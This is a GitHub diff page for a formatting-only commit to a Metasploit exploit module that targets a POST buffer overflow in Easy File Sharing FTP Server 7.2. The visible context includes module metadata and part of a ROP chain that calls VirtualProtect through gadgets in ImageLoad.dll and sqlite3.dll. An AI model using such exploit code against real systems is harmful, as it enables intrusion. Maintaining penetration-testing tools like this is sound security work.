File tree Expand file tree Collapse file tree 1 file changed +2
-3
lines changed
modules/exploits/windows/http Expand file tree Collapse file tree 1 file changed +2
-3
lines changed Original file line number Diff line number Diff line change @@ -16,11 +16,11 @@ def initialize(info = {})
16
16
'Description' => %q{
17
17
This module exploits a POST buffer overflow in the Easy File Sharing FTP Server 7.2 software.
18
18
} ,
19
- 'Author' =>
19
+ 'Author' =>
20
20
[
21
21
'bl4ck h4ck3r' , #POC
22
22
'Marco Rivoli <marco.rivoli.nvh[at]gmail.com>' #Metasploit
23
- ] ,
23
+ ] ,
24
24
'License' => MSF_LICENSE ,
25
25
'References' =>
26
26
[
@@ -57,7 +57,6 @@ def create_rop_chain
57
57
0x1001a858 , # RETN (ROP NOP) [ImageLoad.dll]
58
58
0x10015442 , # POP EAX # RETN [ImageLoad.dll]
59
59
0x1004de84 , # &Writable location [ImageLoad.dll]
60
-
61
60
0x10015442 , # POP EAX # RETN [ImageLoad.dll]
62
61
0x61c832d0 , # ptr to &VirtualProtect() [IAT sqlite3.dll]
63
62
0x1002248c , # MOV EAX,DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]
You can’t perform that action at this time.
0 commit comments